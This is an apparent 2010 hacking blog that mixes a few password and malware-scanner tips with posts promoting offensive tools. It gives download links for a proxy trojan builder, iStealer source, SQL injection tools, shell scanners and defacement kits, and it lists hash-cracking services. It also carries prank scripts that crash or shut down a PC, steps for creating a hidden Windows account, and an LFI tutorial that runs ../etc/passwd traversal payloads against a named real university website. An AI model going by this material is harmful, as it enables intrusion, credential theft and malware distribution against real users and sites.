Thursday, September 30, 2010

Security Tips Helpful Security Tips for Internet Users and Website owners

Special Thanks To Zarabyte Security 
Account Security Tips
1. Try not to use common Passwords use Alphanumeric Passwords.
2. Use a Diffrent Passwords for each site you go to, Don't keep using the same password about 98% of Online Users don't use more then 10 diffrent passwords I recommend using a diffrent Password for every site since alot of people are lazy they use the same password for everything Your typical Hacker love theses kinda things makes it alot easyer to gain access to all your accounts using a diffrent Password will take them longer.
3. Another bad thing is storing important information in your E-Mail You should not keep really important information in your inbox as alot of the Hackers get snoopy and will go thru your emails looking for useful stuff like User names & Passwords for other sites Credit Card info Banking account Info ect...
4. Becareful with using Credit Cards Online Sites most websites store Your credit card info in what is called an SQL Data Base if the WebSite don't have good security on there website files good chance your credit card information could be comprised since alot of the data bases store your billing information in plain text.
Wireless Security Tips
1. Becareful when using Cyber Cafes as it is easy for a hacker to sniff your information over the Network.
2. When setting up a Wireless network don't use WEP as a WEP can be cracked really easy. Use a WPA/WPA2 and dont use a easy Password Phase.
3. Becareful when using someone else Wireless Internet try not to do anything important on Networks you dont own I recommend you buy a VPN when using a Wireless network that isn't yours as I said a hacker can sniff what HTTP information email passwords usernames even sniff AIM/Yahoo/ICQ/MSN Chats.
4. Buy a VPN if your going to be traveling alot and using wireless networks at hotels and other places. A VPN is a tunnel basicly when a hacker trys to sniff your information if your logged in thru a VPN he wont see your information.

Webmaster Security Tips
1. Protect Your visitors & Encrypt your visitors Passwords & Credit card information!
2. Check Your website for SQL Injections & Look into fixing your code.
3. Make sure your server is up to date with all security patches.
4. Hide/Rename or remove the admin folder. Or Password protect the folder

 .....................................................................................................................................................................................................................
 .....................................................................................................................................................................................................................
 ..................................................................................................................................................................................................................... 

Reverse A Phisher Program

Special Thanks To Zarabyte Security
Step 1 -Head to http://reflector.red-gate.com/Download.aspx and download .NET reflector
Step 2 - Run .NET reflector


.NET reflector

 

Step 3 - Download the phisher you want to reverse
Step 4 - Go into your Downloads folder and grab your phisher into .NET Reflector


.NET reflector

 

Step 5 - expand your phisher

.NET reflector

 

Step 6 - Open the one that is the name of the file, not the ".MY", ".MY.RESOURCES", or "-" or "references"

.NET reflector

 

Step 7 - Theirs usually a form1, expand it

.NET reflector

 

Step 8 - Look for button1_click, or something very similar, it's usually near the top, right click it and click 
"Disassemble"

.NET reflector

 

Step 9 - Now look for Network credentials, and you have the email info

.NET reflector


Step 10 - Go to the email, check the inbox


[How to find phishers on youtube]

What to search for

MapleStory:

Meso Generator

NX Generator

Rapidshare:
Point Generator

XBL:

Xboxlive generator
Points Generator

RuneScape:

Item generator
Gold Generator
Skill Changer

 .........................................................................................................................................................................................................................
 .........................................................................................................................................................................................................................
 .........................................................................................................................................................................................................................

A Complete List of md5 Web Crackers



A Complete List of md5 Web Crackers

Here you got a nice list with md5 crackers online enjoy:

- md5gle.com

- online md5 cracker,md5 reverse, md5 decrypt (457,354,352,282)

- md5Crack.com | online md5 cracker

- [ md5 crack password crack hash checker ]

- md5cracker.tk (MD5 Search engine by searches a total of 14 on-line crackers.)

- Index of / (5,889,729)

- AP3 Designs

- http://md5-db.com (The database is approximately 70gb)

- md5.rednoize.com - reverse engineer md5 hashes - powered by rednoize.com (56,502,235)

- GData: An Online MD5 Hash Database (3,251,106)

- TMTO[dot]ORG (306.000.000.000)

- milw0rm.com - free md5/lm hash cracking (Milw0rm Cracker db)

- BlackLight's hash cracker (2,456,288)

- .:Shell-Storm.org:. | DataBase MD5 | ( The data base currently contains 169582 passwords )

- Parallels Confixx (Need Account)

- http://passcracking.com/ (Register to increase your priority)

- http://www.xmd5.org

- Hashkiller.com

- plain-text.info

- insidepro.com

- md5decrypter.co.uk

- c0llision.net

- md5pass.info

- hashcrack.com

- generuj.pl

- authsecu.com

- md5decryption.com

- chwett.com/md5

- md5this.com

- tmto.org

- kerinci.net

- hash.db.hk

- crackfor.me

- md5hood.com

- neofusion.de

- md5.shalla.de

- md5.my-addr.com

- hashcracking.info <-- API: https://hashcracking.info/check.php?hash= {hash}

- md5.opencracking.info

- md5online.net

- macrosoftware.ro/md5

- netmd5crack.com

- bokehman.com

- hash-database.net

- thoran.eu

- md5-database.net

- web-security-services.com

- bitdelivery.net
-----------------------------------------------------------------
CRACKED PASSWORD LIST
-----------------------------------------------------------------
http://www.md5oogle.com/md5hashes.php
[ md5 crack password crack hash checker ]
milw0rm.com - free md5/lm hash cracking
darkc0de.com [ index ]

-----------------------------------------------------------------
MULTI
-----------------------------------------------------------------
md5cracker.org
md5.igrkio.info
hashkiller.com
hashchecker.de
sinhalayo159.07x.net
-----------------------------------------------------------------
IRC
-----------------------------------------------------------------
plain-text.info (irc.Plain-Text.info #rainbowcrack |||| irc.rizon.net #rainbowcrack)
md5.overclock.ch (irc.rizon.net #md5)
c0llision.net (irc.after-all.org #md5crack |||| ircd.hopto.org #md5crack)
-----------------------------------------------------------------
ICQ
-----------------------------------------------------------------
c0llision.net (427-921-047) <- md5, ntlm
hashkiller.com (405-701-776) <- md5



-----------------------------------------------------------------
LM
-----------------------------------------------------------------
lmcrack.com
plain-text.info
-----------------------------------------------------------------
NTLM
-----------------------------------------------------------------
plain-text.info
md5decrypter.co.uk
-----------------------------------------------------------------
SHA1
-----------------------------------------------------------------
md5.rednoize.com
hash.db.hk
md5decrypter.co.uk
-----------------------------------------------------------------
SHA256
-----------------------------------------------------------------
md5.shalla.de
hash.db.hk
-----------------------------------------------------------------
RAINBOW TABLE
-----------------------------------------------------------------
Free Rainbow Tables » Distributed Rainbow Cracking » LM, NTLM, MD5, SHA1, HALFLMCHALL, MSCACHE
Rainbow Tables . net

.................................................................................................................................... ................................................................................................................................................................................................ 
.................................................................................................................................... ................................................................................................................................................................................................
.................................................................................................................................... ................................................................................................................................................................................................

Wednesday, September 29, 2010

Download Free The Best Hacking Tools Collection


The Best Hacking Tools Collection

Collection Includes:
1. Port & IP Scaner
2. Ping & Nukes
3. Java
4. Mail Bomb
5. Chat
6. Serial Software
7. Keyboard Key Logger
8. Credit Card Generator
9. Crash Hard Drive
10.Password Recovery Tool
11.Security
12.Clients

Free Download:
1. Hotfile
2. Uploading

..................................................................................................... .....................................................................................................................
..................................................................................................... .....................................................................................................................
..................................................................................................... .................................................................................................................... 

Tuesday, September 28, 2010

Online Scanners and Malware Analysers

Here is a compilation for a list of Online Scanners and Malware Analysers.

URL : Virus Total
About :
[Image: 6yk504.png]

VirusTotal is a service that analyzes suspicious files and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware detected by antivirus engines.
Specs:

  • Free, independent service
  • Use of multiple antivirus engines
  • Real-time automatic updates of virus signatures
  • Detailed results from each antivirus engine
  • Real time global statistics

URL : Jotti's Malware Scan
About :
[Image: 21abgaf.jpg]

Jotti's malware scan is a free online service that enables you to scan suspicious files with several anti-virus programs. Scanners used are Linux versions; detection differences with Windows versions of the same scanners may occur due to implementation differences. There is a 20MB limit per file. Keep in mind that no security solution offers 100% protection, not even when it uses several anti-virus engines (for example, this scan service).
Files uploaded here are shared with anti-virus companies so detection accuracy of their anti-virus products can be improved. Read more about this in our privacy policy. If you do not want your files to be distributed, please do not send them at all.


URL : Anubis : Analysing Unknown Binaries
About :
[Image: 2enn3x0.jpg]

Anubis is a tool for analyzing the behavior of Windows PE-executables with special focus on the analysis of malware. Execution of Anubis results in the generation of a report file that contains enough information to give a human user a very good impression about the purpose and the actions of the analyzed binary. The generated report includes detailed data about modifications made to the Windows registry or the file system, about interactions with the Windows Service Manager or other processes and of course it logs all generated network traffic. The analysis is based on running the binary in an emulated environment and watching i.e. analyzing its execution. The analysis focuses on the security-relevant aspects of a program's actions, which makes the analysis process easier and because the domain is more fine-grained it allows for more precise results. It is the ideal tool for the malware and virus interested person to get a quick understanding of the purpose of an unknown binary.


URL : ThreatExpert
About :
[Image: 332uxhx.jpg]

ThreatExpert (patent pending) is an advanced automated threat analysis system (ATAS) designed to analyze and report the behavior of computer viruses, worms, trojans, adware, spyware, and other security-related risks in a fully automated mode.
The ThreatExpert system produces reports with the level of technical detail that matches or exceeds antivirus industry standards such as those found in online virus encyclopedias.


URL : ViruSCAN
About :
[Image: vh6mhl.jpg]

VirSCAN.org is a FREE on-line scan service, which checks uploaded files for malware, using antivirus engines, indicated in the VirSCAN list. On uploading files you want to be checked, you can see the result of scanning and how dangerous and harmful/harmless for your computer those files are.


URL : UploadMalware
About :
[Image: 1zv5vg9.jpg]

UploadMalware.com is an easy way for you to submit files for analysis by anti-malware and security professionals.



URL : CWSandbox
About :
[Image: fm0txw.jpg]

Sunbelt CWSandbox provides fast analysis of virus, spyware, trojan, or other malware samples. CWSandbox enables the automatic collection of malware from different inputs including Nepenthes, a web server/interface, or a directory.
Rapidly analyze behavior of malware - including infected trojans, Office documents, browser helper objects (BHOs), malicious URLs and more - by executing the code inside a controlled environment, the Sunbelt malware sandbox!


URL : Norman Sadbox
About :
[Image: 20uqq08.jpg]

Norman Sandbox offers -

  • Free uploads of program files that you suspect are malicious or infected by malicious components, and instant analysis by Norman SandBox. The result is also sent you by email.
  • In-depth information about the analysis performed by Norman SandBox of each malicious file that is uploaded. Search facility in all analyses after Registry keys, file names, etc.
  • Comprehensive statistics of files that are uploaded to Norman SandBox center during the latest day, week and month. You will then be able to see tendencies in the creation of malicious software.

URL : Joebox
About :
[Image: 2m3r3tf.jpg]

Joebox is a simple sandbox application with a unique special concept. It is designed for automatic behaviour analysis of malware on Windows based operating systems.


URL : Microsoft Malware Protection
About :
[Image: acejup.jpg]

The Microsoft Malware Protection Center (MMPC) provides world class antimalware research and response capabilities that support Microsoft's range of security products and services. With laboratories in multiple locations around the globe the MMPC is able to respond quickly and effectively to new malicious and potentially unwanted software threats wherever and whenever they arise.


URL : SuspectFile
About :
[Image: 1znvf3n.jpg]

It not english.Pinch I don't understand it Tongue. Use a translator if you are interested very much


URL : F-Secure Sample Analysis System
About :
[Image: 6ygrjk.jpg]

It requires registration for a person to submit samples, but registration is free Thumbsup


URL : Wepawet
About :
[Image: 2ro70qf.jpg]

Wepawet is a service for detecting and analyzing web-based malware. It currently handles Flash and JavaScript files. Things you can do with Wepawet -

  • Determine if a page or file is malicious
  • Analyze a malicious resource
  • Identify the attacks launched by a malicious resource


URL : Eureka Malware Analysis Page
About :
[Image: 2m5juxs.jpg]

Eureka is a binary static analysis preparation framework. It implements a novel binary unpacking strategy based on statistical bigram analysis and coarse-grained execution tracing. Eureka incorporates advanced API deobfuscation capabilities to facilitate the structural analysis of the underlying malware logic. For each uploaded binary, the Eureka service will attempt to unpack and disassemble the binary, and will produce an annotated callgraph, subroutine/data index page, strings summary, and list of embedded DNS entries.


URL : Comodo Instant Malware Analysis
About :
[Image: j8och4.jpg]

This is a secure malware analysis system which gives a detailed report of what an executable does including registry edits and creating of folders and deleting them.


URL : NoVirusthanks
About :
[Image: 301lvlc.jpg]

Free service that allows users to upload and scan a file with 24 Antivirus Engines. Users can also scan a website url or a remote file with the option Scan Web Address.


URL : VirusTrap
About :
[Image: nfgpiu.jpg]

VirusTrap is a commercial service for penetration testers, network auditors, system administrators who need to analyze unknown binaries during their work. Our scanner was made to help computer users identifying malicious files by scanning them with 25 antivirus engines.


URL : Online Virus Scan
About :
[Image: 2ithb2h.jpg]

VirusChief is a service that analyzes suspicious files and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware detected by antivirus engines.
Specs:
- Free, independent service
- Use of multiple antivirus engines
- Real-time automatic updates of virus signatures
- Detailed results from each antivirus engine
- Link output
- BB-Code output
- File deletion after the scan-report was generated


URL : FortiGaurd
About :
[Image: 2uo48z9.jpg]

Yet another malware scanner which lets you upload unknown binaries and gives you a report about them via email.


URL : Filterbit - OPSWAT Metascan
About :
[Image: sm3lms.jpg]

Powered by OPSWAT Metascan®, Filterbit™ is a free service where you can upload files for scanning, analysis and identification by multiple antivirus engines. Filterbit facilitates rapid detection of viruses, trojans, worms and other malware that may be contained within your uploaded files. In many cases, Filterbit can also scan, analyze and individually identify multiple files contained within a file archive such as Winzip, WinRar, PKZip and other types. Filterbit also analyzes the types of each uploaded file such as Microsoft Word, PDF, TXT and other types and reports this in a human readable format. Filterbit currently uses Metascan® antivirus engines from CA (Computer Associates), Norman Data Defense Systems, ClamAV, ESET, Microworld and VirusBuster.

............................................................................................................................................... ........................................................................
............................................................................................................................................... ........................................................................
............................................................................................................................................... ........................................................................ 

shellz scanner


It uses some dorks to find uploaded shells, once u found a good one u can use the proxy checker to be anonymous and surf using the integrated navigator...

u need the ocx of winsock if u use the proxy finder.

http://www.megaupload.com/fr/?d=T93DHKDB

.............................................................................................................................................................................................................
.............................................................................................................................................................................................................
.............................................................................................................................................................................................................

Download Free WebProxy Trojen Creator V.1.2 With Video Tutorial

W3bPr0xy Tr0j4n Creator V.1.2 By fLaSh
This tool create a fully proxy trojan to use as private proxy..
The trojan has just only about 47kb (no icon)!
Coded by me with VB.NET and C# (.net framework v.2)

Features:
-Fully proxy server trojan with Hijacking EXE with embebbed the trojan;
-Supports multi-listening ports;
-Supports multi-connections from various clients (multi-thread system);
-Supports cookies;
-Supports SSL;
-Report IP/Ports to mail of the trojan owner.
-Assembly Manipulation(version info, change icon, etc..);
-Trojan compressed binary (anti-embebbed detection AV);
-Etc..

Screen Shots:


Download Link:
http://rapidshare.com/files/21358005...0j4n_v.1.2.rar

Video torturial:
http://rapidshare.com/files/21397609...0j4n_v.1.2.wmv

........................................................................................... .............................................................................................................................
........................................................................................... .............................................................................................................................
........................................................................................... ............................................................................................................................. 

How to Fix Folder Options Missing Problem

Hello Friends Today I am going to tell how get back the Folder Options .Most of times it happens that viruses infects your system and folder options becomes missing. First of all friends I share one thing with you all that 90 percent of doesn't delete things on your Computer they just modify their properties like either they hide them or corrupt them. And your information there are several ways to recover from that. Today I am sharing with you "How o fix Folder Options Missing Problem".

STEPS INVOLVED:
1. Go to the Start Menu and open the run.

2. In the Run Type "gpedit.msc" (Without quotes) and press enter.

3.Now you will see Something like this..


4.Now Go to User Configuration>>>Administrative Templates>>>Windows Component>>>Windows Explorer.

5.Click on Windows Explorer you will find the 3rd option on the right side of screen "Removes the Folder Option menu item from the Tools menu".

6.Just check it, if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured.

7.I hopes that you will find the option after restarting windows.


That's the Overall Process of fixing the Folder Options Missing Problem....
................................................................................................................................................. .....................................................................
................................................................................................................................................. .....................................................................
................................................................................................................................................. ..................................................................... 

Monday, September 27, 2010

Very Good Notepad Hacks

Hey Friends today I am going to share few New Notepad hacks. They are really cool and crazy one's. So Please think atleast three to four times to use them on your PC.


UNLIMITED NOTEPAD WINDOWS HACK
This will pop up endless notepads until the computer freezes and crashes. Copy the below code in notepad and save it as ".vbs" extension.

Code:-
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top



CAPS LOCK CRAZY TRICK
This constantly turns caps lock on and off really fast continuously.

Code:-
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop


UNLIMITED BACKSPACE HACK
This makes it so the backspace key is constantly being pressed.

Code:-
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
       

Hack your friend's keyboard and make him type "You are a fool" simultaneously:

Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop


Convey your friend a message and shut down his / her computer:
 
Code:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files .
................................................................................................................................................................ .......................................................
................................................................................................................................................................ .......................................................
................................................................................................................................................................ .......................................................
................................................................................................................................................................ .......................................................  

VistaLogger



File Info

Report generated: 28.7.2009 at 22.12.43 (GMT 1)
Filename: testwindowsxp.exe
File size: 20 KB
MD5 Hash: 9bce818115941b46e31c0583c482b820
SHA1 Hash: E09D12C8B34595C97EDFA103C3339DBD4D395F4A
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 0 on 22

Detections

a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -

http://www.multiupload.com/9GLI5JZ6TE
........................................................................................................ ................................................................................................................
........................................................................................................ ................................................................................................................
........................................................................................................ ................................................................................................................ 

Hack Websites A Good Collection Of SQL Injection Tools


1.Havij 1.7 -

http://rapidshare.com/files/322555573/Havij_1.07.exe

2.SQLi Helper 2.7 -
http://rapidshare.com/files/322556434/sqliHelper_2.7.rar

3.SQLi Injecter V2.0 -

http://rapidshare.com/files/322559013/SqlInjv2.rar

4.m4x MSSQL Injection

http://rapidshare.com/files/322557397/m4xmssql.rar

5.m4x MySQL Injection
http://rapidshare.com/files/322559902/m4xmysql.rar

6.SQL TooL v2.3

http://rapidshare.com/files/322560724/SQL_TOOL_V2.3.rar

7.
Simple SQLi Dumper v0.1

http://rapidshare.com/files/322561134/Simple_SQLi_Dumper.rar

.....................................................................................................................................................................................................................
.....................................................................................................................................................................................................................
.....................................................................................................................................................................................................................
..................................................................................................................................................................................................................... 

Default Best Collection Of Shells

....................................................................................................... ..................................................................................................................
....................................................................................................... ..................................................................................................................
....................................................................................................... .................................................................................................................. 

[VB6] iStealer 5.0 [Soucre]

I've only seen on unkn0wn and opensc so here it is..

PS. When i said i have only seen on unkn0wn and opensc i meant the only "legit" source i have seen.
Download:
http://rapidshare.com/files/269600583/iStealer_5.0_Source.rar

...................................................................................................................... ....................................................................................................
...................................................................................................................... ....................................................................................................
...................................................................................................................... ................................................................................................... 

Defacement Tools (With Video Tutorial)

Defacement Tools





Now you can see what's hidden

DOWNLOAD :

or
FOR FURTHER TUT :
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
......................................................................................................................................................................................................................... 

Create Hidden Account In Windows XP

Since we are going to do all the Editing in Window   Registry it is Recommended to Back Up the Registry before going Further.

After you have Backed up your registry follow the Steps to Create your Hidden Account:
First Goto Start -> Run -> Type regedit -> Enter
In the Left Menu goto,

HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Cu rrentVersion\Winlogon\SpecialAccounts\UserList

In the Right pane, Right click -> New -> String Value
Right click on the new String Value and click Rename
Type the Name of the Account you want to hide.
Hit Enter then Right click on the String Value again and Change value to 0 which hides it. If you want it to be Visible to all Enter the Value 1.
Now Save and Exit the Registry and Logoff.
Goto welcome screen and Hit ctrl+alt+del twice to bring up Logon prompt
Type hidden Accounts name and password

.................................................................................................................................. ....................................................................................
.................................................................................................................................. ....................................................................................
.................................................................................................................................. .................................................................................... 

How to hack websites using LFI (Local File Inlcusion) A Directory Transversal Attack


What is root directory of web server ?

It is a specific directory on server in which the web contents are placed and can be seen by website visitors. The directories other that root may contain any sensitive data which administrator do not want visitors to see. Everything accessible by visitor on a website is  placed in root directory. The visitor can not step out of root directory.

what does ../ or ..\ (dot dot slash) mean  ?

The ..\ instructs the system to go one directory up. For example, we are at this location
C:\xx\yy\zz. On typing ..\ , we would reach at C:\xx\yy.

Again on typing
..\ , we would rech at C:\xx . 

Lets again go at locatio
n C:\xx\yy\zz. Now suppose we want to access a text file abc.txt placed in folder xx. We can type ..\..\abc.txt . Typing ..\ two times would take us two directories up (that is to directory xx) where abc.txt is placed.
Note : Its ..\ on windows and ../ on UNIX like operating syatem.
What is Directory Transversel attack?

Directory Traversal is an HTTP exploit which allows attackers to access restricted directories and execute commands outside of the web server's root directory.

The goal of this attack is  to access sensitive files placed on web server by stepping out of the root directory using dot dot slash .

The following example will make clear everything

Visit this website vulnerable to directory transversal attack

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=notification.php

This webserver is running on UNIX like operating system. There is a directory 'etc' on unix/linux which contains configration files of programs that run on system. Some of the files are passwd,shadow,profile,sbin  placed in 'etc' directory.

The file
etc/passwd contain the login names of users and even passwords too.

Lets try to access this file on webserver by stepping out of the root directory. Carefully See the position of directories placed on the webserver.


We do not know the actual names and contents of directories except 'etc' which is default name , So I have
marked them as A,B,C,E or whatever.

We are in directory in F accessing the webpages of website.


Lets type this in URL field and press enter

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=etc/passwd

This will search the directory 'etc' in F. But obviously, there is nothing like this in F, so it will return nothing
Now type
http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../etc/passwd
Now this will step up one directory (to directory E ) and look for 'etc' but again it will return nothing.
Now type

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../etc/passwd
Now this will step up two directories (to directory D ) and look for 'etc' but again it will return nothing.

So by proceeding like this, we we go for this URL

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../../../../etc/passwd

It takes us 5 directories up to the main drive and then to '
etc' directory and show us contents of 'passwd' file.
To understand the contents of 'passwd' file, visit http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format


You can also view
etc/profile ,etc/services and many others files like backup files which may contain sensitive data. Some files like etc/shadow may be not be accessible because they are accesible only by privileged users.
Note- If proc/self/environ would be accessible, you might upload a shell on server which is called as Local File Inclusion.
Counter Measures
1. Use the latest web server software 2. Effectively filter the user's input
................................................................. .....................................................................................................................................................
................................................................. .....................................................................................................................................................
................................................................. .....................................................................................................................................................